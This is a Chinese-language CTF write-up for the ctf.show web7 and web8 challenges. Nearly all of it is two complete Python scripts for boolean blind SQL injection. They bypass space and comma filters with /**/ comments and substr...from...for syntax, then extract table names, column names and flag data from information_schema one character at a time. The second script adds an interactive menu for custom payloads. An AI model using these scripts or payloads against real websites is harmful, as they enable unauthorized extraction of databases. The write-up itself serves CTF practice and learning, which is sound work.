web7_8
2025年6月18日大约 7 分钟
分析一下
1. web7 与 8 差不多,web8,多了个逗号过滤
主要都是被空格过滤了,所以只能用 /**/ 代替空格,并且需要爆破
2. web7
import requests
import time
import urllib3
# 禁用SSL警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def sql_injection_exploit():
"""
SQL注入自动化爆破程序 - 修复SSL问题版本
"""
# 初始化会话和基本参数
s = requests.session()
# 更新URL(根据错误信息修正)
url = 'https://2fd242fc-c02b-4859-8072-b7e30909741d.challenge.ctf.show/index.php'
# 设置请求头和SSL配置
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Connection': 'keep-alive'
}
s.headers.update(headers)
# 关键:禁用SSL证书验证
s.verify = False
# 设置适配器以处理连接问题
adapter = requests.adapters.HTTPAdapter(
max_retries=3,
pool_connections=10,
pool_maxsize=10
)
s.mount('https://', adapter)
s.mount('http://', adapter)
def brute_force_query(payload_template, description, hex_encode=False):
"""
通用的暴力破解函数 - 增强版
"""
result = ""
print(f"\n开始爆破: {description}")
for i in range(1, 100):
print(f"正在爆破第 {i} 位...", end='', flush=True)
found = False
# ASCII可打印字符范围 32-126
for j in range(32, 127):
try:
payload = payload_template % (str(i), str(j))
full_url = url + '?id=0/**/or/**/' + payload
response = s.get(
url=full_url,
verify=False, # 关键:禁用SSL验证
timeout=15,
allow_redirects=True
)
# 根据响应判断是否成功
if 'I asked nothing' in response.text or 'You are in' in response.text:
result += chr(j)
print(f" 找到: '{chr(j)}' -> 当前结果: {result}")
found = True
break
except requests.exceptions.SSLError as e:
print(f"\nSSL错误: {e}")
time.sleep(2)
continue
except requests.exceptions.ConnectionError as e:
print(f"\n连接错误: {e}")
time.sleep(2)
continue
except requests.exceptions.Timeout as e:
print(f"\n超时错误: {e}")
time.sleep(1)
continue
except Exception as e:
print(f"\n其他错误: {e}")
time.sleep(1)
continue
# 添加延时避免请求过快
time.sleep(0.2)
if not found:
print(f" 第 {i} 位未找到,爆破结束")
break
print(f"\n{description} 爆破完成: {result}")
return result
def test_connection():
"""
测试连接是否正常
"""
try:
print("测试目标连接...")
response = s.get(url, verify=False, timeout=10)
print(f"连接测试成功,状态码: {response.status_code}")
print(f"响应长度: {len(response.text)}")
return True
except Exception as e:
print(f"连接测试失败: {e}")
return False
# 首先测试连接
if not test_connection():
print("无法连接到目标,程序退出")
return None
# 测试基本注入
print("\n测试基本SQL注入...")
test_payload = "1=1"
try:
test_response = s.get(url + '?id=1/**/or/**/' + test_payload, verify=False, timeout=10)
print(f"注入测试响应长度: {len(test_response.text)}")
except Exception as e:
print(f"注入测试失败: {e}")
# 1. 爆破数据库表名
print("\n=== 开始爆破流程 ===")
# 修正payload格式
table_payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),/**/%s,/**/1))=%s"
tables = brute_force_query(table_payload, "数据库表名")
if not tables:
# 尝试其他格式的payload
print("尝试其他payload格式...")
table_payload2 = "ascii(substring((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())/**/from/**/%s/**/for/**/1))=%s"
tables = brute_force_query(table_payload2, "数据库表名(格式2)")
# 2. 如果找到表名,继续爆破
if tables and 'flag' in tables.lower():
print(f"\n发现包含flag的表: {tables}")
# 爆破字段名
column_payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167),/**/%s,/**/1))=%s"
columns = brute_force_query(column_payload, "flag表字段名")
# 3. 读取flag数据
if columns:
print(f"\n发现字段: {columns}")
flag_payload = "ascii(substr((select/**/flag/**/from/**/flag),/**/%s,/**/1))=%s"
flag = brute_force_query(flag_payload, "flag内容")
print(f"\n🎉 最终FLAG: {flag}")
return flag
else:
# 直接尝试读取flag
print("直接尝试读取flag...")
flag_payload = "ascii(substr((select/**/flag/**/from/**/flag),/**/%s,/**/1))=%s"
flag = brute_force_query(flag_payload, "flag内容")
if flag:
print(f"\n🎉 最终FLAG: {flag}")
return flag
return tables
def main():
"""
主函数
"""
print("=== CTF SQL注入自动化爆破工具 (SSL修复版) ===")
try:
result = sql_injection_exploit()
if result:
print(f"\n✅ 爆破成功!")
print(f"结果: {result}")
else:
print("\n❌ 爆破失败,请检查payload和目标响应")
except KeyboardInterrupt:
print("\n⚠️ 用户中断程序执行")
except Exception as e:
print(f"\n❌ 程序执行出错: {e}")
import traceback
traceback.print_exc()
if __name__ == "__main__":
main()3. web8
import requests
import time
import sys
import urllib3
# 禁用SSL警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def sql_blind_injection():
"""
SQL盲注自动化爆破工具 - SSL修复版
"""
# 目标URL - 注意这里是HTTPS
url = 'https://d9c563cf-001f-4153-9fe1-964d7fa2db04.challenge.ctf.show/index.php?id=-1/**/or/**/'
# 配置session
session = requests.Session()
session.verify = False # 禁用SSL证书验证
session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
})
# 预定义的payload模板
payloads = {
'1': {
'name': '获取当前数据库名',
'payload': 'ascii(substr(database()/**/from/**/%d/**/for/**/1))=%d'
},
'2': {
'name': '获取所有表名',
'payload': 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())/**/from/**/%d/**/for/**/1))=%d'
},
'3': {
'name': '获取flag表字段名',
'payload': 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)/**/from/**/%d/**/for/**/1))=%d'
},
'4': {
'name': '获取flag表数据',
'payload': 'ascii(substr((select/**/flag/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d'
},
'5': {
'name': '尝试其他常见字段',
'payload': 'ascii(substr((select/**/value/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d'
},
'6': {
'name': '自定义payload',
'payload': ''
}
}
def brute_force_data(payload_template, description, max_length=100):
"""
暴力破解数据
"""
result = ''
print(f'\n开始{description}...')
print(f'Payload模板: {payload_template}')
print('='*60)
for i in range(1, max_length + 1):
found_char = False
print(f'正在获取第 {i} 个字符: ', end='', flush=True)
# ASCII可打印字符范围 32-126
for j in range(32, 127):
try:
# 构造完整payload
current_payload = payload_template % (i, j)
full_url = url + current_payload
# 发送请求 - 使用session并禁用SSL验证
response = session.get(full_url, timeout=15)
# 多种成功判断条件
success_indicators = [
'If' in response.text,
'You are in' in response.text,
'welcome' in response.text.lower(),
len(response.text) > 1000 # 假设成功响应较长
]
if any(success_indicators):
char = chr(j)
result += char
print(f"'{char}' -> 当前结果: {result}")
found_char = True
break
except requests.exceptions.SSLError as e:
print(f'\nSSL错误,跳过: {e}')
time.sleep(1)
continue
except requests.exceptions.RequestException as e:
print(f'\n请求异常: {e}')
time.sleep(1)
continue
except Exception as e:
print(f'\n其他异常: {e}')
continue
# 添加延时避免请求过快
time.sleep(0.1)
# 如果没找到字符,说明已经结束
if not found_char:
print('未找到,数据获取完成')
break
print(f'\n{description}完成!')
print(f'最终结果: {result}')
print('='*60)
return result
def test_connection():
"""测试连接"""
try:
print('测试目标连接...')
test_payloads = [
'1=1',
'ascii("a")=97',
'length(database())>0'
]
for payload in test_payloads:
print(f'测试payload: {payload}')
response = session.get(url + payload, timeout=15)
print(f'状态码: {response.status_code}, 响应长度: {len(response.text)}')
# 显示响应内容片段
print(f'响应片段: {response.text[:200]}...')
if response.status_code == 200:
return True
return False
except Exception as e:
print(f'连接测试失败: {e}')
return False
def display_menu():
"""显示菜单"""
print('\n' + '='*60)
print('SQL盲注自动化爆破工具 (SSL修复版)')
print('='*60)
print('请选择要执行的操作:')
for key, value in payloads.items():
print(f'{key}. {value["name"]}')
print('0. 退出程序')
print('='*60)
# 测试连接
if not test_connection():
print('连接测试失败,但继续尝试...')
print('可能是响应判断条件需要调整')
# 存储结果
results = {}
# 主循环
while True:
display_menu()
try:
choice = input('请输入选择 (0-6): ').strip()
if choice == '0':
print('程序退出')
break
elif choice in ['1', '2', '3', '4', '5']:
payload_info = payloads[choice]
# 询问最大长度
max_len = input(f'请输入最大长度 (默认60): ').strip()
max_len = int(max_len) if max_len else 60
# 执行爆破
result = brute_force_data(
payload_info['payload'],
payload_info['name'],
max_len
)
# 保存结果
results[payload_info['name']] = result
# 特殊处理
if choice in ['4', '5'] and result:
print(f'\n🎉 可能的FLAG: {result}')
if 'ctfshow' in result.lower() or 'flag{' in result or result.startswith('ctfshow{'):
print('🚩 这很可能就是最终FLAG!')
elif choice == '6':
# 自定义payload
print('\n自定义payload模式')
print('payload中用 %d 表示位置和ASCII值')
print('例如: ascii(substr(user()/**/from/**/%d/**/for/**/1))=%d')
custom_payload = input('请输入自定义payload: ').strip()
if custom_payload:
desc = input('请输入描述: ').strip() or '自定义查询'
max_len = input('请输入最大长度 (默认50): ').strip()
max_len = int(max_len) if max_len else 50
result = brute_force_data(custom_payload, desc, max_len)
results[desc] = result
else:
print('无效选择,请重新输入')
except KeyboardInterrupt:
print('\n\n用户中断程序')
break
except ValueError:
print('请输入有效的数字')
except Exception as e:
print(f'发生错误: {e}')
# 显示所有结果
if results:
print('\n' + '='*60)
print('所有结果汇总:')
print('='*60)
for desc, result in results.items():
print(f'{desc}: {result}')
def quick_flag_mode():
"""
快速flag模式 - 直接获取flag
"""
url = 'https://d9c563cf-001f-4153-9fe1-964d7fa2db04.challenge.ctf.show/index.php?id=-1/**/or/**/'
# 配置session
session = requests.Session()
session.verify = False
session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
print('🚀 快速flag获取模式')
# 尝试多种可能的字段名
field_attempts = [
('flag', 'ascii(substr((select/**/flag/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d'),
('value', 'ascii(substr((select/**/value/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d'),
('content', 'ascii(substr((select/**/content/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d'),
('data', 'ascii(substr((select/**/data/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d')
]
for field_name, payload_template in field_attempts:
print(f'\n尝试字段: {field_name}')
result = ''
for i in range(1, 80):
found = False
print(f'第{i}位: ', end='', flush=True)
for j in range(32, 127):
try:
payload = payload_template % (i, j)
response = session.get(url + payload, timeout=10)
# 多种成功判断
if ('If' in response.text or 'You are in' in response.text or
'welcome' in response.text.lower()):
result += chr(j)
print(f"'{chr(j)}' -> {result}")
found = True
break
except:
continue
time.sleep(0.05)
if not found:
break
if result and len(result) > 5:
print(f'\n🎉 字段 {field_name} 的值: {result}')
if 'ctfshow' in result.lower() or 'flag{' in result:
print('🚩 这很可能就是FLAG!')
return result
print('\n❌ 所有尝试都未成功')
return None
def main():
print('='*60)
print('CTF SQL盲注工具 (SSL修复版)')
print('='*60)
print('1. 完整模式 (推荐)')
print('2. 快速flag模式')
mode = input('选择模式 (1/2): ').strip()
try:
if mode == '2':
quick_flag_mode()
else:
sql_blind_injection()
except Exception as e:
print(f'程序异常: {e}')
import traceback
traceback.print_exc()
if __name__ == "__main__":
main()